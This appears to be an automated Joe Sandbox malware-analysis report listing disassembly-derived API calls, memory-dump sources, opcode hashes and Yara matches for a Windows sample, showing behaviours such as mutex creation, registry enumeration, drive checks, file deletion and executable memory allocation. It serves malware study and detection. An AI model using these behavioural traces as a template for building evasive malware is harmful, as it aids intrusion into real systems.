                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateFontIndirectObjectStock
                                    • String ID:
                                    • API String ID: 1613733799-0
                                    APIs
                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0242D257
                                    • CloseHandle.KERNEL32(?), ref: 0242D277
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0242D28F
                                    • HeapFree.KERNEL32(00000000), ref: 0242D296
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHeap$ChangeFindFreeHandleNotificationProcess
                                    • String ID:
                                    • API String ID: 3129886909-0
                                    APIs
                                    • Sleep.KERNEL32(00001000), ref: 0242CC41
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242CC88
                                      • Part of subcall function 0242CB2D: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 0242CB75
                                      • Part of subcall function 0242CB2D: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 0242CBB2
                                      • Part of subcall function 0242CB2D: RegCloseKey.ADVAPI32(?), ref: 0242CC2E
                                    • Sleep.KERNEL32(00004E20), ref: 0242CC64
                                      • Part of subcall function 0242CB2D: GetFileAttributesA.KERNEL32(00000000), ref: 0242CBDB
                                      • Part of subcall function 0242CB2D: Sleep.KERNEL32(00000100), ref: 0242CC11
                                    • Sleep.KERNEL32(00057E40), ref: 0242CC7E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                    • String ID:
                                    • API String ID: 3734488975-0
                                    APIs
                                      • Part of subcall function 00424D50: CreatePen.GDI32(-00000001,?,?), ref: 00424DD2
                                    • GetStockObject.GDI32(00000005), ref: 004235A3
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004235B1
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCreateCursorInfoLoadObjectStock
                                    • String ID: _EL_DrawPanel
                                    • API String ID: 263904558-4003497747
                                    • Opcode ID: 9ac7f8c863350940e6e1986d1f26cf9e81115b3c04aed88735904e849c880fc6
                                    • Instruction ID: 0460f0353c4b2de318bb1f15f0897d884f5d39077a524cd576f4d87ccd0fd8c8
                                    • Opcode Fuzzy Hash: 9ac7f8c863350940e6e1986d1f26cf9e81115b3c04aed88735904e849c880fc6
                                    • Instruction Fuzzy Hash: 62317EB1704750AFD314DF18DC41F6BB7E5EB88B04F40491EF55987381DB79A9008BAA
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseQueryValuewsprintf
                                    • String ID: %c%d_%d
                                    • API String ID: 2691868063-4129319098
                                    • Opcode ID: 61ce7898fa3edff1f8ec89299f17681fa911a36080b622e5157a27156af886a5
                                    • Instruction ID: 32de78e32376109dc824deebc32f7b472dcbb8c7c728236e4f260a89430e46ac
                                    • Opcode Fuzzy Hash: 61ce7898fa3edff1f8ec89299f17681fa911a36080b622e5157a27156af886a5
                                    • Instruction Fuzzy Hash: 951104B1D41228EBDB24CF95DD88BD9B7B4BB48304F9045DAD10AA7280C7749BC8CF94
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValuewsprintf
                                    • String ID: %c%d_%d
                                    • API String ID: 2072284396-4129319098
                                    • Opcode ID: d305161aba741c62dad010c15a7f468163b7b2e96f158f8e28fb27a34dc522f5
                                    • Instruction ID: 4f144ddb4fc222ac7addf6017533c9e4e2ccc30cffb288fb3a6aa9587b49f636
                                    • Opcode Fuzzy Hash: d305161aba741c62dad010c15a7f468163b7b2e96f158f8e28fb27a34dc522f5
                                    • Instruction Fuzzy Hash: F1012CB1D41128ABDB24CF95DD8CFEAB7B8BB48304F5041C9E209A6240C7749BC8CF94
                                    APIs
                                      • Part of subcall function 004C5FF6: TlsGetValue.KERNEL32(006142FC,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?,00000100,00000000,0042AC80), ref: 004C6035
                                    • GetCurrentThreadId.KERNEL32 ref: 004BE3A6
                                    • SetWindowsHookExA.USER32(00000005,004BE18E,00000000,00000000), ref: 004BE3B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentHookThreadValueWindows
                                    • String ID: Ba
                                    • API String ID: 933525246-483125461
                                    • Opcode ID: 29b9aae5abd4fca5964503a250fd4b29605abe3faa42ce6b15b05b221eeec5e8
                                    • Instruction ID: 9a133aeb3c36cc048caf52070f3eafec8a41bf6220206912175d0c19844cb158
                                    • Opcode Fuzzy Hash: 29b9aae5abd4fca5964503a250fd4b29605abe3faa42ce6b15b05b221eeec5e8
                                    • Instruction Fuzzy Hash: 08E06531600B00AED2709F675905F9B76E8DBD5B51F10553FF54982640D674E841CB7D
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,#u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_), ref: 04360017
                                    • Sleep.KERNEL32(000000FF), ref: 0436001F
                                    Strings
                                    • #u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_, xrefs: 04360012
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3831264888.0000000004360000.00000040.00001000.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4360000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateMutexSleep
                                    • String ID: #u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_
                                    • API String ID: 1464230837-1497663014
                                    • Opcode ID: 041385edafa9481cfd7278016624504f93ce3e81e88add6092aebc8c37314de0
                                    • Instruction ID: 1d44c73c4c72566f86f16d72ba092226a098a11c191c5e516ff06e97ad5edb19
                                    • Opcode Fuzzy Hash: 041385edafa9481cfd7278016624504f93ce3e81e88add6092aebc8c37314de0
                                    • Instruction Fuzzy Hash: 0CC080315441CD57D700EEA08C09B6837385B08712F100312F5B9A8CE4D73062804B1F
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00628902
                                    • FindCloseChangeNotification.KERNEL32 ref: 0062891A
                                    • Sleep.KERNEL32(00002710), ref: 00628925
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChangeCloseCreateFindMutexNotificationSleep
                                    • String ID:
                                    • API String ID: 607942068-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: 350572bdaea0304a70c33adcd584c926e5516770ea4a4ad03808ccf75b2d784f
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: 51B17B75A016998FEF10CF18DD44BE937A6FF54301F484829DC09AF2A1DB75AA81CF4A
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(02434050), ref: 02422410
                                    • RtlLeaveCriticalSection.NTDLL(02434050), ref: 02422724
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3168844106-0
                                    • Opcode ID: 61733606fb079c792acf03253f65053a54256ed624295d125602130690d78f4f
                                    • Instruction ID: a6e1876e40902dbb0fecc75f1e437a983601b2116b163b2cb18036ad356ffd28
                                    • Opcode Fuzzy Hash: 61733606fb079c792acf03253f65053a54256ed624295d125602130690d78f4f
                                    • Instruction Fuzzy Hash: ECA1BFB1D041A89BDB35CB95CC90BEEB7B6BF44304F5480EADA09AB241D7B05B89CF54
                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042A259
                                    • IsWindow.USER32 ref: 0042A287
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042A356
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessagePeek$Window
                                    • String ID:
                                    • API String ID: 1210580970-0
                                    • Opcode ID: 187b308dbf171e8d37968bd37c9ea0b6189e1286ba0c45a420ef79306f67df00
                                    • Instruction ID: f907a51aedf76f2611a8a5105eb0f7c07987ff6b3b405e3f60f627b49ca2c918
                                    • Opcode Fuzzy Hash: 187b308dbf171e8d37968bd37c9ea0b6189e1286ba0c45a420ef79306f67df00
                                    • Instruction Fuzzy Hash: 66316071704226EFD714DF24E984AABB3A8FF44349F40016EED1583340D775ED69CAAA
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00410F13
                                    • GetParent.USER32(?), ref: 00410F1D
                                    • EqualRect.USER32(?,?), ref: 00410FD1
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClientRectScreenWindow$EqualLongParent
                                    • String ID:
                                    • API String ID: 3286289996-0
                                    • Opcode ID: 1d5a40d18057f79ae47ddeb70d7000ebec6ce2ecc0726b29fa7d463e1de40726
                                    • Instruction ID: 15f6815d7bce29e04a7444650ba576bb2e531206dd4922216284c3fd3da7f5a2
                                    • Opcode Fuzzy Hash: 1d5a40d18057f79ae47ddeb70d7000ebec6ce2ecc0726b29fa7d463e1de40726
                                    • Instruction Fuzzy Hash: 0F3118B16043029FD724DF6AC88196BB7E9BF88314F044A2EF895C3350D774EC858B56
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,024A3A30), ref: 0242CAE0
                                    • GetDriveTypeA.KERNEL32(00000000), ref: 0242CAF9
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242CB20
                                      • Part of subcall function 0242BADD: Sleep.KERNEL32(?,?,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB57
                                      • Part of subcall function 0242BADD: lstrcat.KERNEL32(?,024A5658), ref: 0242BB75
                                      • Part of subcall function 0242BADD: lstrcpy.KERNEL32(00000000,?), ref: 0242BB8F
                                      • Part of subcall function 0242BADD: CharLowerA.USER32(00000000,?,?,00000000,02433630,024A0240,000000FF,?,0242CB1B,00000003,00000000,00000000,00000000), ref: 0242BB9C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$CharDriveExitLowerSleepThreadTypeUserlstrcat
                                    • String ID:
                                    • API String ID: 362529667-0
                                    • Opcode ID: f216ac5581bfe7dfe4ff1dfbab5d38bb6e41758e21ee8a8f9038270ea223ced9
                                    • Instruction ID: 43e999b9b1a00bb2aeb7337a2b5e2ac6e10c36b79c6a89b4cc4012ef25c8e0a7
                                    • Opcode Fuzzy Hash: f216ac5581bfe7dfe4ff1dfbab5d38bb6e41758e21ee8a8f9038270ea223ced9
                                    • Instruction Fuzzy Hash: 0E1180719002189FDB298B59CC54BEABBB9EB48B00F0405EAE709A7240DB716A54CF91
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 024211D2
                                    • Sleep.KERNEL32(00004E20), ref: 024211F3
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024211FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitObjectSingleSleepThreadUserWait
                                    • String ID:
                                    • API String ID: 295063474-0
                                    • Opcode ID: cc2caef5e03ede73cea636d63e7201d2c41a0a8e00b48c5908ee79104b1ce604
                                    • Instruction ID: bdefa6875ada45ef91176af57548950c11ee3660c9714fd0b49b5c729b3affbe
                                    • Opcode Fuzzy Hash: cc2caef5e03ede73cea636d63e7201d2c41a0a8e00b48c5908ee79104b1ce604
                                    • Instruction Fuzzy Hash: 7701A270A40228EBEB06CFC1DD44BBE7B75AB05704F504046E90D672C1C7B29F64DB50
                                    APIs
                                    • GlobalFree.KERNEL32(?), ref: 0242B825
                                    • RtlLeaveCriticalSection.NTDLL(02434018), ref: 0242B837
                                    • Sleep.KERNEL32(00000400), ref: 0242B852
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalFreeGlobalLeaveSectionSleep
                                    • String ID:
                                    • API String ID: 2599486065-0
                                    • Opcode ID: 622864012b3458ed6115674a9ef5c24db42a0dddbd95fe6f05ccabf126fbdea2
                                    • Instruction ID: b2b03902117cd888f210f214a8bc5ea51d6c5ec5a93e6aa12b3d921751315d8e
                                    • Opcode Fuzzy Hash: 622864012b3458ed6115674a9ef5c24db42a0dddbd95fe6f05ccabf126fbdea2
                                    • Instruction Fuzzy Hash: 1DF05E76E803168BEB258F85D8097FDB770FB04326F000169EA25A3680C73A1555CF40
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BDCF0
                                      • Part of subcall function 004C5FF6: TlsGetValue.KERNEL32(006142FC,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?,00000100,00000000,0042AC80), ref: 004C6035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologValue
                                    • String ID: Ba
                                    • API String ID: 3700342317-483125461
                                    • Opcode ID: 4940d6c0a1d236279989cbbd311e788973838fc19b5a32bbe1ed35f3eb786344
                                    • Instruction ID: bfadfd5d42b8c54b2fdff8633d4eb08d3e35066eebefdf48a2d75ea75c4a5b15
                                    • Opcode Fuzzy Hash: 4940d6c0a1d236279989cbbd311e788973838fc19b5a32bbe1ed35f3eb786344
                                    • Instruction Fuzzy Hash: 30212776900209EFCF15DF55C481AEE7BB9FF44318F1040AAF919AB641D778AE44CBA4
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0063E902
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0063E9B1
                                      • Part of subcall function 0063EBC1: KiUserExceptionDispatcher.NTDLL(?,0063EB69), ref: 0063EBC7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocCreateDispatcherExceptionMutexUserVirtual
                                    • String ID:
                                    • API String ID: 979207007-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: 2acce396b23e9bdbe9f0c66d83fc87edf770f2d68677d980aa99b4d2e4701c19
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: 79B14B75A002898FEF10CF14CD44BE977A6FF54304F484525DD09AF3A1D776AA81CBAA
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 043107EC
                                    • Sleep.KERNEL32(00002710), ref: 0431080F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4310000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateMutexSleep
                                    • String ID:
                                    • API String ID: 1464230837-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: c1aa8fa9c57fbafc359af538ffe60da7249491c25c948457293f595f5a000555
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: C4B14775A002898FEF18CF14CD84BA937B9BF44310F485925DD09AFAB1D771BA80CB4A
                                    APIs
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateMappingView
                                    • String ID:
                                    • API String ID: 3452162329-0
                                    • Opcode ID: cad824f100b975ee43af7378ce4ce0b65362b7a2f1823714ee30df1823b73057
                                    • Instruction ID: 140d03ecb175d38d51f3c81798e079bd0048d36ab188d3fdb90844c8e2418529
                                    • Opcode Fuzzy Hash: cad824f100b975ee43af7378ce4ce0b65362b7a2f1823714ee30df1823b73057
                                    • Instruction Fuzzy Hash: B601A874A40208EFD714CF84DA45F99BBF5BB48714F348288EA086B3C1C772AE45DB44
                                    APIs
                                    • MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                    • UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileView$Unmap
                                    • String ID:
                                    • API String ID: 3282598733-0
                                    • Opcode ID: 0fe50f710d322869498a4a8262a0eabfd5281542e034c847b71978673071092a
                                    • Instruction ID: 09ff6dacee46042063c3d9cee3ee9f7065aceeab038a01848f935c91b1cd6266
                                    • Opcode Fuzzy Hash: 0fe50f710d322869498a4a8262a0eabfd5281542e034c847b71978673071092a
                                    • Instruction Fuzzy Hash: 4DF0AF74D40308EBDB15CFA5ED8DBCDBB78A704309F208545E5086B2C0D3B15A98DB40
                                    APIs
                                    • LoadImageA.USER32(?,?,00000001,00000020,00000020,00000000), ref: 00434B0B
                                    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00434B1D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ImageLoad
                                    • String ID:
                                    • API String ID: 306446377-0
                                    • Opcode ID: 97660890461d6f248d087cfd64102127baef94f3fc10542732be59e4ac67cab9
                                    • Instruction ID: 99e3c80fe0c46458d54351069af077a3b2b9013ff7e392769ec94d4996fec16e
                                    • Opcode Fuzzy Hash: 97660890461d6f248d087cfd64102127baef94f3fc10542732be59e4ac67cab9
                                    • Instruction Fuzzy Hash: 11E0ED3234131177D620CE5A8C85F9BF7A9FB8DB10F540819B344AB1D1C2F1B4458669
                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000020,?,02429A55,?,00000000), ref: 02425740
                                    • DeleteFileA.KERNEL32(?,?,02429A55,?,00000000), ref: 0242574A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDelete
                                    • String ID:
                                    • API String ID: 2910425767-0
                                    • Opcode ID: b69c557a84d6782e6a7565767df2bc1d604140ded95d4cbc74542836b27083c9
                                    • Instruction ID: 66475dc1dde81f4b84ad516a9fafc2897687b715e930b8a4c38da75c98bbdd76
                                    • Opcode Fuzzy Hash: b69c557a84d6782e6a7565767df2bc1d604140ded95d4cbc74542836b27083c9
                                    • Instruction Fuzzy Hash: E7E0D8705C4714FBC7284B62D84AB6637986B88794FC0C423FE0A9D140D679E0CDCB50
                                    APIs
                                    • FindClose.KERNEL32(00000000), ref: 0242BE65
                                    • Sleep.KERNEL32(00000400), ref: 0242BE70
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFindSleep
                                    • String ID:
                                    • API String ID: 1358061995-0
                                    • Opcode ID: ebfbaac0b6fab46e20a7014245e6efb63f14c29218179942c90a94eb66b89ba2
                                    • Instruction ID: 75368b97eecc14ca1b0a14f0b550b5acdd5927bd928612c64a3a9fc0f32d3673
                                    • Opcode Fuzzy Hash: ebfbaac0b6fab46e20a7014245e6efb63f14c29218179942c90a94eb66b89ba2
                                    • Instruction Fuzzy Hash: A0E0BFB2E44614CBCB248BA4E8457A9B7B0FB48725F400699DB1992280D7355951CB55
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 004ABAAC
                                      • Part of subcall function 004B1DB4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B1DF1
                                      • Part of subcall function 004B1DB4: RtlEnterCriticalSection.NTDLL(?), ref: 004B1E0C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                    • String ID:
                                    • API String ID: 1616793339-0
                                    • Opcode ID: b1dede2be62a4c489378df9b3a10dc5415157c9fe19706e0dd93d5a745115784
                                    • Instruction ID: 8ec9f527ebc461e76cc2ccd335f3ffd665a1fa9b85f978b4960b4916685a06de
                                    • Opcode Fuzzy Hash: b1dede2be62a4c489378df9b3a10dc5415157c9fe19706e0dd93d5a745115784
                                    • Instruction Fuzzy Hash: F121B831A00205AFDB10DFA9DC42BDE7764EB11724F14411BF411EB6D2D77CA94197E8
                                    APIs
                                    • CreateWindowExA.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004BE4B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 797b1778c3459dfc6a2b4d29c90a2d1ea4a4c340ea5bdf0460bab65829f75aa3
                                    • Instruction ID: ef0075ef44dde289700079a5cd2cc4dd3f5a4943ad784640b19fef36598d3d0e
                                    • Opcode Fuzzy Hash: 797b1778c3459dfc6a2b4d29c90a2d1ea4a4c340ea5bdf0460bab65829f75aa3
                                    • Instruction Fuzzy Hash: 2A31AB79A00219AFCF41DFA9C8449DEBBF1BF4C300F00856AF908E7210E7359A519FA4
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C1F31
                                      • Part of subcall function 004C1C94: __EH_prolog.LIBCMT ref: 004C1C99
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: ccfe15d8706e6a888d6ce2a6a293767325390129f491631b2a4310bbea0a7046
                                    • Instruction ID: b8d8586ee599876245598e0afbbebd95e0b848bb9f298c291167beb15e2ee16a
                                    • Opcode Fuzzy Hash: ccfe15d8706e6a888d6ce2a6a293767325390129f491631b2a4310bbea0a7046
